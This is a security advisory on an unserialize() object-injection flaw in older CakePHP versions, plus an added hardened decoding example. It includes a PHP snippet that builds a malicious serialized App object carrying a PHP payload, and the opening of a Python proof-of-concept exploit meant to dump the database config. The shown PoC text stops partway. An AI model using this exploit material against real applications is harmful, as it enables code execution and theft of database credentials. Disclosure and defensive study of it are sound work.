CakePHP <= 1.3.5/1.2.8 unserialize() Vulnerability


Source: http://securityreason.com/securityalert/8026

CakePHP <= 1.3.5/1.2.8 unserialize() Vulnerability

felix | at | malloc.im

====================================================================================================

Overview:

"CakePHP is a rapid development framework for PHP that provides an extensible architecture for developing, maintaining, and deploying applications. Using commonly known design patterns like MVC and ORM within the convention over configuration paradigm, CakePHP reduces development costs and helps developers write less code." - cakephp.org

CakePHP is vulnerable to a file inclusion attack because of its use of the "unserialize()" function on unchecked user input. This makes it possible to inject arbitrary objects into the scope.

Details:

CakePHP uses the following function in the Security component to protect against XSRF attacks with POST requests:

    function _validatePost(&$controller) {
        // -- snip --
        $check = $controller->data;
        $token = urldecode($check['_Token']['fields']);
        if (strpos($token, ':')) {
            list($token, $locked) = explode(':', $token, 2);
        }
        $locked = unserialize(str_rot13($locked));
        // -- snip --

-- Snip --

The $check array contains our POST data and $locked is a simple (rot-13 obfuscated) serialized string, which is completely under our control.
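A hardened form of that decoding step, added here as an example (it is not CakePHP's code and not the actual 1.3.6/1.2.9 patch): the server signs the locked-field list when the form is rendered and verifies the signature before unserialize() is reached, then refuses to instantiate any class. The names sign_locked and decode_locked, the server-side $secret and the '|' separator are assumptions; it assumes PHP 7.1 or later.

```php
<?php
// Added example, not CakePHP's code: sign the locked-field list when the
// form is rendered and verify it before unserialize() runs on POST.
// Assumes a server-side secret ($secret) and PHP >= 7.1.

function sign_locked(array $lockedFields, string $secret): string {
    $blob = str_rot13(serialize(array_values($lockedFields)));
    // MAC goes first: hex contains no '|', so the split below is unambiguous
    return hash_hmac('sha256', $blob, $secret) . '|' . $blob;
}

// Returns the field list, or null on any failure (caller rejects the POST).
function decode_locked(string $value, string $secret): ?array {
    $parts = explode('|', $value, 2);
    if (count($parts) !== 2) {
        return null;                            // no MAC at all
    }
    [$mac, $blob] = $parts;
    // Constant-time compare; a client-built blob fails here, before
    // unserialize() is ever reached.
    if (!hash_equals(hash_hmac('sha256', $blob, $secret), $mac)) {
        return null;
    }
    // Defence in depth: allowed_classes=false (PHP >= 7.0) turns any
    // "O:" entry into __PHP_Incomplete_Class, whose __destruct never runs.
    $locked = unserialize(str_rot13($blob), ['allowed_classes' => false]);
    if (!is_array($locked)) {
        return null;
    }
    foreach ($locked as $field) {
        if (!is_string($field)) {
            return null;                        // only plain field names
        }
    }
    return $locked;
}

// Demo with constructed values.
$secret = 'constructed-demo-secret';
$good = sign_locked(['User.id', 'User.role'], $secret);
assert(decode_locked($good, $secret) === ['User.id', 'User.role']);

// A client-supplied rot13'd object, as in the advisory, carries no valid MAC
// and is rejected before unserialize() sees it.
$forged = str_rot13('O:3:"App":1:{s:7:"__cache";i:1;}');
assert(decode_locked($forged, $secret) === null);
```

On PHP 5 (no allowed_classes option) the signature check alone still keeps unserialize() off client-built data; json_encode/json_decode of the field list is the simpler replacement where the serialized format is not required.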

PHP5 introduces a destructor with the "__destruct" method. Each object will execute its __destruct method at the end of its lifetime and we can use this to turn an unchecked unserialize() call into a useful exploit. (See Stefan Esser's talk at http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf for more information.)

CakePHP defines the App class with the following destruct method:

    function __destruct() {
        if ($this->__cache) {
            $core = App::core('cake');
            unset($this->__paths[rtrim($core[0], DS)]);
            Cache::write('dir_map', array_filter($this->__paths), '_cake_core_');
            Cache::write('file_map', array_filter($this->__map), '_cake_core_');
            Cache::write('object_map', $this->__objects, '_cake_core_');
        }
    }

As we can see, this method can be abused by a manipulated object to write arbitrary values into the _cake_core cache.

The most interesting key to corrupt is the file_map. It provides a mapping between classes and PHP files and is used to load additional classes at runtime.

The real code for the loading of classes is a bit complicated but it all boils down to the following code in the _load method inside the App class:

    if (file_exists($file)) {
        if (!$this->return) {
            require($file);
            $this->__loaded[$file] = true;
        }
        return true;
    }

This means we can execute arbitrary files on the local filesystem.

CakePHP uses a file based caching system in its standard configuration, and the cache data is written in serialized form to a known location. We can use this information to create a manipulated App object that executes our PHP payload:

    $x = new App();
    $x->__cache = 1;
    $x->__map = array("Core" => array("Router" => "../tmp/cache/persistent/cake_core_file_map"),
                      "Foo" => "<? phpinfo(); exit(); ?>");
    $x->__paths = array();
    $x->__objects = array();
    echo serialize($x);

POC:

See http://malloc.im/burnedcake.py for a working POC exploit. The PoC is also shown below.

Patch:

This bug was patched in versions 1.3.6 and 1.2.9.

    #!/usr/bin/python
    #
    # BurnedCake.py - CakePHP <= 1.3.5/1.2.8 Cache Corruption Exploit
    # written by felix@malloc.im
    #
    # This code exploits a unserialize() vulnerability in the CakePHP security
    # component. See http://malloc.im/CakePHP-unserialize.txt for a detailed
    # analysis of the vulnerability.
    #
    # The exploit should work against every CakePHP based application that
    # uses POST forms with security tokens and hasn't changed the cache
    # configuration (file-system caching is standard). Exploiting
    # other caching deployments is possible but not as elegant.
    #
    # This POC will output the database config file of the running CakePHP application,
    # other payloads are easily possible with a changed PHP code.

    from optparse import OptionParser
    from urlparse import urlparse, urljoin
    import urllib2
    import urllib
    import re

    def request(url, data="", headers={}, debug=0):
        if (data == ""):
            request = urllib2.Request(url=url, headers=headers)
        else:
            request = urllib2.Request(url=url, headers=headers, data=data)
        debug_handler = urllib2.HTTPHandler(debuglevel=debug)
        opener = urllib2.build_opener(debug_handler)
        response = opener.open(request)
        return response

    if __name__ == "__main__":
        parser = OptionParser(usage="usage: %prog [options] url")
        parser.add_option("-p", "--post", dest="post",
                          help="additional post content as urlencoded string")
        parser.add_option("-v", action="store_true", dest="verbose",
